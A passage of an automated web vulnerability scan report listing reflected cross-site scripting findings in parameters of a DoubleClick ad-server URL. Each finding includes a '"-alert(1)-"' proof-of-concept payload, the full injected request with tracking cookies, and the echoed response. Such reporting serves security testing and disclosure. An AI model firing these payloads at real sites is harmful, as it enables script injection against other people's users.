Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
//adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=2449a"-alert(1)-"02e7851709b&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET
...[SNIP]...

2.25. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68347"-alert(1)-"a281dbf653d was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP68347"-alert(1)-"a281dbf653d&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP68347"-alert(1)-"a281dbf653d&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_N
...[SNIP]...

2.26. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d7a7"-alert(1)-"af455f9762e was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=6d7a7"-alert(1)-"af455f9762e&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
18%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=6d7a7"-alert(1)-"af455f9762e&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://ww
...[SNIP]...

2.27. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80b7b"-alert(1)-"3fb9e79be61 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=10080b7b"-alert(1)-"3fb9e79be61&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=10080b7b"-alert(1)-"3fb9e79be61&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/
...[SNIP]...

2.28. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a66f"-alert(1)-"7cd177737c8 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=5a66f"-alert(1)-"7cd177737c8&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=5a66f"-alert(1)-"7cd177737c8&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-
...[SNIP]...

2.29. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e566b"-alert(1)-"9a7ddde7086 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e566b"-alert(1)-"9a7ddde7086&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e566b"-alert(1)-"9a7ddde7086&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&even
...[SNIP]...

2.30. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27907"-alert(1)-"2bb12fa9372 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24327907"-alert(1)-"2bb12fa9372&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24327907"-alert(1)-"2bb12fa9372&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250
...[SNIP]...

2.31. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6fcc"-alert(1)-"b32620849b2 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330a6fcc"-alert(1)-"b32620849b2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330a6fcc"-alert(1)-"b32620849b2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_
...[SNIP]...

2.32. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64942"-alert(1)-"d331bee272d was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=51371764942"-alert(1)-"d331bee272d&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
et/click%3Bh%3Dv8/3b05/17/14b/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=51371764942"-alert(1)-"d331bee272d&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg
...[SNIP]...

2.33. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20cf0"-alert(1)-"da21d5ca8f4 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=220cf0"-alert(1)-"da21d5ca8f4&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
